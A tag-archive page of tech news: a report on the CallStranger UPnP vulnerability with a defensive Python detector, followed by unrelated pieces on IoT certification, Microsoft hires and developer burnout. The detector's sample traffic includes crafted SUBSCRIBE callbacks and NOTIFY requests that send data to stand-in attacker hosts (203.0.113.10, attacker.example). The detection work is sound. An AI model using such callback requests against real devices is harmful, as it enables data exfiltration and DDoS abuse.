Tag Archives: named

‘CallStranger’ vulnerability affects billions of UPnP devices

A newly disclosed vulnerability named “CallStranger” affects billions of connected devices and can be exploited to steal data or initiate large-scale DDoS attacks.

CallStranger was disclosed Monday by Yunus Çadırcı, senior cybersecurity manager at EY Turkey. The vulnerability affects the Universal Plug and Play (UPnP) protocol, which is widely used by a variety of devices, from enterprise routers and IoT devices to video game consoles and smart TVs.

“The vulnerability — CallStranger — is caused by Callback header value in UPnP SUBSCRIBE function can be controlled by an attacker and enables an SSRF [server-side request forgery]-like vulnerability, which affects millions of Internet facing and billions of LAN devices,” Çadırcı wrote on the research site.

The vulnerability, CVE-2020-12695, can allow unauthorized users to bypass security products such as DLP and exfiltrate data, or to abuse connected devices for DDoS attacks that use TCP amplification.

Çadırcı said data exfiltration is the “biggest risk” for enterprises and advised organizations to check their logs for suspicious activity around UPnP. The threat to consumer devices, he said, is lower, but those devices could be compromised and used for DDoS attacks against larger organizations. “Because it also can be used for DDoS, we expect botnets will start implementing this new technique by consuming end user devices,” he wrote.

Work on the UPnP protocol began in 1999 under an industry initiative known as the UPnP Forum; the protocol was designed to simplify network connections in homes and corporate environments. The Open Connectivity Foundation, which assumed control of the protocol in 2016, updated its UPnP 2.0 specification in April to address the vulnerability.

However, patches have not yet been released for CallStranger.

“Because this is a protocol vulnerability, it may take a long time for vendors to provide patches,” Çadırcı wrote.

Many connected devices will need firmware updates to resolve CallStranger, and IoT devices have historically been difficult to patch because some products are shipped without the ability to receive and install such updates.

In a post on CallStranger, vulnerability management vendor Tenable said it expects more vulnerable devices to be identified and patched as time goes on.

“[M]anufacturers of affected devices are in the process of determining its impact,” Tenable wrote in the blog post. “As a result, we anticipate newly affected devices will be reported and patches will be released over time for devices still receiving product support.”

In the meantime, Çadırcı advised enterprises to “take their own actions” by blocking UPnP ports for connected devices that don’t need the functionality and by configuring security products to block all SUBSCRIBE and NOTIFY HTTP packets in both ingress and egress traffic. In addition, he recommended that ISPs block access to the widely used UPnP control and eventing ports that are reachable from the public internet.
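The two recommendations above (watch the logs, block SUBSCRIBE/NOTIFY at the boundary) both come down to recognising one pattern in HTTP traffic: a SUBSCRIBE whose CALLBACK header names a host the device should never be talking to, and the NOTIFY that the device then sends there. The checker below is an added example written for this page; it is not code from the CallStranger research site, the article, or any vendor. It assumes the RFC 1918, link-local and loopback ranges are “inside”, and the sample requests it carries are constructed, with 203.0.113.10 and attacker.example standing in for an attacker-controlled endpoint.

```python
"""Flag CallStranger-style (CVE-2020-12695) UPnP eventing traffic.

A control point subscribes to a device's event service with an HTTP SUBSCRIBE
whose CALLBACK header lists the URLs the device should NOTIFY. Nothing ties
those URLs to the subscriber, so a device will connect to any host named there.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption: these ranges count as "inside". Adjust to the site's address plan.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16",
    "127.0.0.0/8", "fe80::/10", "fc00::/7", "::1/128")]

# CALLBACK carries one or more URLs, each in angle brackets: <url1><url2>
CALLBACK_URL = re.compile(r"<([^>]+)>")


def parse_request(raw):
    """Split an HTTP/1.1 request into method, target and case-folded headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def host_is_local(host, local_nets=LOCAL_NETS):
    """True only for an IP literal inside local_nets.

    DNS names are deliberately treated as not local: UPnP eventing is meant to
    use IP literals, and a name in a callback lets the attacker re-point the
    device's outbound connections later without sending another SUBSCRIBE.
    """
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in local_nets)


def assess(raw, local_nets=LOCAL_NETS):
    """Classify one UPnP eventing request.

    SUBSCRIBE (ingress to a device): every CALLBACK URL whose host is outside
    local_nets is reported; that is the SSRF-like CallStranger pattern.
    NOTIFY (egress from a device): reported if the HOST header is external,
    i.e. the device is delivering event data off-network.
    Other methods are not eventing traffic and are never flagged.
    """
    req = parse_request(raw)
    external = []
    if req["method"] == "SUBSCRIBE":
        for url in CALLBACK_URL.findall(req["headers"].get("callback", "")):
            if not host_is_local(urlsplit(url).hostname, local_nets):
                external.append(url)
    elif req["method"] == "NOTIFY":
        host = req["headers"].get("host", "")
        # "//" prefix makes urlsplit read the value as an authority, not a path.
        if not host_is_local(urlsplit("//" + host).hostname, local_nets):
            external.append(host)
    return {"method": req["method"], "external": external,
            "suspicious": bool(external)}


def find_suspicious(requests, local_nets=LOCAL_NETS):
    """Indexes of the requests that should be blocked or investigated."""
    return [i for i, raw in enumerate(requests)
            if assess(raw, local_nets)["suspicious"]]


# Constructed sample traffic, not captured from any real device.
SAMPLE_REQUESTS = [
    # 0: legitimate subscription from a control point on the same LAN
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\nHOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://192.168.1.20:5000/notify>\r\nNT: upnp:event\r\n"
    "TIMEOUT: Second-1800\r\n\r\n",
    # 1: CallStranger pattern: the device is told to call an outside host
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\nHOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://203.0.113.10:80/exfil?d=secret>\r\nNT: upnp:event\r\n"
    "TIMEOUT: Second-1800\r\n\r\n",
    # 2: callback list mixing a LAN URL with a DNS name the attacker controls
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\nHOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://192.168.1.20:5000/notify><http://attacker.example/cb>\r\n"
    "NT: upnp:event\r\nTIMEOUT: Second-1800\r\n\r\n",
    # 3: the resulting egress: the device NOTIFYs the external host
    "NOTIFY /exfil?d=secret HTTP/1.1\r\nHOST: 203.0.113.10\r\nNT: upnp:event\r\n"
    "NTS: upnp:propchange\r\nSEQ: 0\r\nCONTENT-TYPE: text/xml\r\n\r\n"
    "<e:propertyset xmlns:e=\"urn:schemas-upnp-org:event-1-0\"/>",
    # 4: normal NOTIFY delivered to the LAN subscriber
    "NOTIFY /notify HTTP/1.1\r\nHOST: 192.168.1.20:5000\r\nNT: upnp:event\r\n"
    "NTS: upnp:propchange\r\nSEQ: 0\r\nCONTENT-TYPE: text/xml\r\n\r\n"
    "<e:propertyset xmlns:e=\"urn:schemas-upnp-org:event-1-0\"/>",
]

if __name__ == "__main__":
    for i in find_suspicious(SAMPLE_REQUESTS):
        print(i, assess(SAMPLE_REQUESTS[i]))
```

Run stand-alone it reports samples 1, 2 and 3. Two design choices matter in practice: the NOTIFY check is the one to run on egress, because that is where exfiltration actually leaves the network even if the SUBSCRIBE arrived over a path you do not inspect; and a hostname in a callback is flagged rather than resolved, since resolving it inside the detector would itself be the attacker-controlled outbound request you are trying to prevent.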

Çadırcı first discovered the vulnerability late last year and reported it to the Open Connectivity Foundation on Dec. 12. Public disclosure of CallStranger was pushed back several times beyond the traditional 90-day deadline because several vendors and ISPs requested more time.

The CallStranger research site lists a number of vulnerable products from leading vendors such as Microsoft, Cisco, Broadcom and Samsung, as well as a list of additional devices that could be affected but have yet to be confirmed by the vendors.


Intertek joins AT&T IoT Accelerator Program

Intertek has been named a preferred testing and certification laboratory for the AT&T IoT Accelerator Program. It is the first U.S. lab approved as part of this program, which offers AT&T network certification testing to vendors who want to launch IoT devices on the AT&T network.

The program offers low-cost LTE modules certified for the AT&T network.

Intertek was named as an approved laboratory because of its experience with connected products and ability to guide device makers through the process. Intertek will also conduct pre-testing and testing activities, fulfill research and development requests, complete documentation needs and navigate the submission and approval process.

Other approved labs include 7 Layers, Cetecom, CTTL/ATMCL, Dekra, PCTest, SGS SA, Sporton International and UL LLC.

The IoT market is ever-growing, with Grand View Research predicting that the global IoT market will reach $949.42 billion by 2025, a compound annual growth rate of 29.4% over that period. It attributes that growth to rising demand for machine-to-machine systems, the desire for predictive maintenance and the need to put operational technology data in context.

In August, Microsoft reported that IoT adoption has grown significantly, particularly in commercial, enterprise-grade organizations. In its report, Microsoft tied enterprise IoT adoption closely to business success and said businesses can expect a 30% ROI within three years of IoT implementation.

Due to the seemingly lucrative and popular IoT trend, AT&T is not the only organization with an IoT accelerator program. Soracom also offers one, as does Plug and Play, among many others.

Soracom’s program also aims to help developers get products built and into production quickly and economically. It works with partners such as Carbon Five, Breadware, Microsoft Azure, Amazon Web Services, PubNub, Seeed and the Igor Institute.

Plug and Play brands itself as an innovation platform, aiming to bring together IoT startups and large corporations. It hosts accelerator programs over 50 times a year, with each lasting for 12 weeks. It gives startups the chance to build corporate clients and meet mentors and investors. Plug and Play’s IoT corporate partners include Panasonic, ADT, Fujitsu, Nintendo, Maxell and more.


Microsoft names Lindsay-Rae McIntyre Chief Diversity Officer

REDMOND, Wash. – Feb. 11, 2018 – Microsoft Corp. has named Lindsay-Rae McIntyre as its next chief diversity officer (CDO). As CDO, McIntyre will implement and drive a multitude of existing cross-company initiatives to further Microsoft’s progress in building a diverse and inclusive culture. In addition to leading Microsoft’s efforts internally, McIntyre will also play a key role in building partnerships and working with leading organizations outside of Microsoft to help advance diversity and inclusion in the tech sector overall.

While transition timing has yet to be finalized, McIntyre will relocate to Microsoft’s headquarters in Redmond, Washington, and report directly to Kathleen Hogan, Chief People Officer. 

McIntyre joins Microsoft from IBM, where she spent over two decades serving as the HR leader for several business units in key regions around the world. She most recently held the role of Chief Diversity Officer and Vice President of HR, leading the diversity agenda globally for IBM and heading up the corporate processes to identify and advance executive talent. Her work and that of her team have been recognized with a variety of prestigious diversity-related awards.

“Diversity enriches our performance and products as well as the communities where we live and work,” said Hogan.  “We have devoted substantial energy and resources to becoming a more diverse and inclusive company, and continuing our progress is central to our evolving culture at Microsoft.  With her extensive expertise, Lindsay-Rae will bring great perspective and leadership as we look to build on our strengths in this area.”

“I am excited to join Microsoft, a company that has not only adapted well to rapid change in the business landscape but elevated the standards of what we can expect in a technology provider when it comes to diversity and inclusion,” McIntyre said. “I look forward to advancing that agenda and contributing to the foundation Microsoft is building.”

McIntyre received a Bachelor of Arts degree with highest honors from the University of North Carolina at Chapel Hill, where she was a Morehead Scholar, and graduated from the Cross Continent MBA Program at the Fuqua School of Business at Duke University.

She has been a thought leader for topics ranging from supporting working mothers, creating great places to work for multicultural women, LGBTQ equality, paid leave, and flex time strategies. She is also an advocate for people with disabilities, was a teacher for the Deaf, and taught American Sign Language earlier in her career.

McIntyre has spent over 20 years in human resources in the technology industry, living and working throughout the U.S. and overseas. She and her husband Stephen have three small children. 

About Microsoft
Microsoft (Nasdaq “MSFT” @microsoft) is the leading platform and productivity company for the mobile-first, cloud-first world, and its mission is to empower every person and every organization on the planet to achieve more.

The post Microsoft names Lindsay-Rae McIntyre Chief Diversity Officer appeared first on Stories.

Microsoft announces expansion of Montreal research lab, new director

Geoffrey Gordon has been named Microsoft Research Montreal’s new research director. Photo by Nadia Zheng.

Microsoft plans to significantly expand its Montreal research lab and has hired a renowned artificial intelligence expert, Geoffrey Gordon, to be the lab’s new research director.

The company said Wednesday that it hopes to double the size of Microsoft Research Montreal within the next two years, to as many as 75 technical experts. The expansion comes as Montreal is becoming a worldwide hub for groundbreaking work in the fields of machine learning and deep learning, which are core to AI advances.

“Montreal is really one of the most exciting places in AI right now,” said Jennifer Chayes, a technical fellow and managing director of Microsoft Research New England, New York City and Montreal.

Chayes said Gordon, currently a professor of machine learning at Carnegie Mellon University, was a natural choice for the job in part because he’s interested in both the foundational AI research that addresses fundamental AI challenges and the applied work that can quickly find its way into mainstream use.

“We want to be doing the research that will be infusing AI into Microsoft products today and tomorrow, and Geoff’s research really spans that,” she said. “He’ll be able to help us improve our products and he’ll also be laying the foundation for AI to do much more than is possible today.”

Jennifer Chayes, technical fellow and managing director of Microsoft Research New England, New York City and Montreal.

Chayes also noted that Gordon’s broad and deep AI expertise will be a major asset to the lab. She noted that Gordon is an expert in reinforcement learning, in which systems learn through trial and error, and he’s also done groundbreaking work in areas such as robotics and natural language processing. The ability to combine all those areas of expertise will be key to developing sophisticated AI systems in the future.

“Given that we want a very broad AI lab, Geoff is the ideal person to lead it, and to create the fundamental research that underlies the next generation of AI,” she said.

Gordon said he’s especially interested in creating AI systems that have what we think of as long-term thinking: the ability to come up with a coherent plan to solve a problem or to take multiple actions based on clues it gets along the way. That’s the kind of thing that comes easily to people but is currently rudimentary in most AI systems.

Over the last few years, AI systems have gotten very good at individual tasks, like recognizing images or comprehending words in a conversation, thanks to a combination of improved data, computing power and algorithms.

Now, researchers including Gordon are working on ways to combine those skills to create systems that can augment people’s work in more sophisticated ways. For example, a system that could accurately read clues based on what it is seeing and hearing to anticipate when it would be useful to step in and help would be much more valuable than one that requires a person to ask for help with a specific task when needed.

“We have, in some cases, superhuman performance in recognizing patterns, and in very restricted domains we get superhuman performance in planning ahead,” he said. “But it’s surprisingly difficult to put those two things together – to get an AI to learn a concept and then build a chain of reasoning based on that learned concept.”

Microsoft began developing its research presence in Montreal a year ago, when it acquired the deep learning startup Maluuba.

The Microsoft Research team in Montreal has already made groundbreaking advances in AI disciplines that are key to the type of systems Gordon imagines. That includes advances in machine reading comprehension – the ability to read a document and provide information about it in a plainspoken way – and in methods for teaching AI systems to do complex tasks, such as by dividing large tasks into small tasks that multiple AI agents can handle.

Gordon said he was drawn to the new position both because of the work the team in Montreal is doing and the opportunity to collaborate with the broader Montreal AI community.

“Research has always been about standing on the shoulders of giants, to borrow a phrase from a giant – and it’s even more so in the current age,” Gordon said.

The city has become a hotbed for AI advances thanks to a strong academic and research presence, as well as government funding commitments.

Yoshua Bengio, an AI pioneer who heads the Montreal Institute for Learning Algorithms, said Gordon’s presence and the Microsoft lab’s expansion will help continue to build the momentum that the Montreal AI community has seen in recent years. He noted that Gordon’s area of focus, on AI systems that can learn to do more complex tasks, is complementary to the work he and others in the community also are pursuing.

“It’s one of the strengths of Montreal,” said Bengio, who is also an AI advisor to Microsoft.

Joelle Pineau, an associate professor of computer science at McGill University and director of Montreal’s Facebook AI Research Lab, said she was thrilled to hear Gordon would be joining the Montreal AI ecosystem.

“There is no doubt that the Montreal AI community will be deeply enriched by his presence here,” Pineau said.

Navdeep Bains, Canada’s minister of innovation, science and economic development, said he was looking forward to seeing the work that Gordon and Microsoft Research Montreal will produce.

“I am pleased that our government’s investment in innovation and skills continues to position Canada as a world-leading destination for AI companies and impressive researchers like Geoff Gordon,” he said.

The expansion of the Montreal lab is part of Microsoft’s long history of investing in international research hubs, including labs in the U.S., Asia, India and Cambridge, United Kingdom. Chayes said the company’s international presence has helped it attract and retain some of the world’s best researchers in AI and other fields, and it also has helped ensure that the company’s AI systems reflect a diversity of experiences and cultures.

For example, Chayes said the fact that Montreal is a bilingual city could help inform the company’s work in areas such as translation and speech recognition.

“It’s a culture where you go back and forth between two languages. That’s a very interesting environment in which to develop tools for natural language understanding,” she said.

The French version of this blog post can be found on the Microsoft News Center Canada.


Allison Linn is a senior writer at Microsoft. Follow her on Twitter.

Undercapitalization is the disease, developer burnout the symptom

Imagine a DevOps engineer named Pat. You’re the vice president of engineering, and Pat has been a superstar in your organization for years. She’s always pleasant in standups. Any criticism she makes is positive and supportive. She’s always reliable when on call, and Pat makes few mistakes.

Then, something changes. She becomes snippy in standups. It’s taking her longer to answer emails. Last month, she altered a deployment script in a way that caused the Amazon bill to jump. You sense something is wrong, so you go to her boss.

Pat’s boss reports having a similar experience. Pat, who used to be the poster child for an exemplary DevOps engineer, is dramatically regressing. You’re both mystified.

Something is obviously amiss. You ask to see her work schedule over the last year and the tickets assigned to her. In addition, you take a trip to HR and request the budget history of the group Pat works in, as well as the head count history.

As you review the reports, certain facts pop out. First, Pat has not had a vacation in the last year. Also, her last raise was only 3% due to company revenue issues. Half of Pat’s past work tickets involved issues related to the new automated container-provisioning framework the company implemented last year.

Pat is burnt out. Now, conventional wisdom has a way to prevent burnout. Just give employees enough time to rest, refresh and acquire the skills necessary to do the work required of them. This is the route organizations typically take to addressing developer burnout. And this is the flaw: Organizations are addressing the symptoms.

The disease is undercapitalization.

Allow me to elaborate.

No capital? No profit

Capital is anything that enhances a person’s or organization’s ability to perform economically useful work. Capital can take the form of money, time, machinery, information or real estate, for example. Businesses require capital in order to make goods and provide services. The mistake many businesses make is to not have enough capital on hand to meet objectives. This is particularly true of startups. I’ve experienced this personally.

Earlier in my life, I wanted to be in the restaurant business. I had the necessary expertise. So, I saved some money and found some investors to pitch in to cover the startup costs and projected operating expenses for a year.

However, my business plan had a serious flaw: I overestimated revenue growth. I thought my cash flow would start to cover expenses within three months of operation. Turns out I was wrong. I was not getting the number of customers needed within the time frame required.

I started to run out of money. I fell behind paying my bills. I had to cut back on staff. I found myself working seven days a week to make up for the staff I had to lay off.

Eventually, the business closed its doors. I was a mess physically and emotionally. Upon reflection, I came to realize I had just run out of time. My customer rate was growing, and the business was becoming more efficient. The shortcoming was I didn’t have the capital — in this case, time — to meet my objective.

Let’s go back to Pat and her burnout.

Pat had not had a vacation in a year. She had been given a small raise and was working with technology new to her and the organization. How did this come about?

Pat had not had a vacation in a year because the department is short-staffed. She had been given a pittance of a raise because the company couldn’t afford more. And she is struggling with new technology because the company needed to implement automated provisioning in order to meet the growth requirements necessary to stay competitive.

To put it succinctly:

No vacation = not enough staff = undercapitalization

Small raise = not enough money = undercapitalization

Struggling with new technology = not enough time = undercapitalization

The business does not have the capital required to meet its objective. And, thus, burnout sets in.

So, how does a company avoid burnout?

The answer is to make sure it meets its capital requirements.

This is easier said than done. Most companies think they have enough capital. Not surprisingly, most companies are overly optimistic, particularly small to medium-sized tech companies that have growing DevOps departments.

These companies get the value of DevOps, but underestimate the capital requirements necessary for success. Many follow the lean startup mentality — fewer employees using more automation, while getting more back massages at their desks and free food at the snack bar.

Providing automation, back massages and free food is not necessarily the best tactic for ensuring adequate capitalization. Keeping adequate capital on hand is a continuous activity that requires ongoing, dedicated attention. Just look at AT&T.

AT&T executives understood from the company’s inception that it was engaged in a capital-intensive business. Its leadership kept raising capital. In the beginning, the capital was needed to lay landlines. By the 1960s, the capital was used to put telecommunication satellites into space. Today, with the acquisition of DirecTV, the company is moving into on-demand video streaming. The company has a voracious appetite for capital, and it’s become quite good at acquiring it.

Developer burnout
Logz.io’s 2017 DevOps Pulse survey found that 70% of its respondents could see themselves burning out.

This is the lesson to be learned. Burnout in general, and developer burnout in particular, can be traced back to undercapitalization. Undercapitalization is rarely a temporary condition. Rather, it results from a business failing to plan from the start to ensure its capital needs are always met. This means making sure there is enough money, time and staff to meet the demands at hand. Doing more with less rarely works for long. Eventually, a company will pay the price, and one of the first signs is employee burnout.

We in DevOps know there is no way automation will make bad code better once it’s out the door. You need to get a new version out as soon as possible. The same is true of adequate capitalization. Once the symptoms set in, the only way to beat the disease is to release a new version of the business, with plans to continuously meet the business’s demand for the capital required to satisfy its objectives.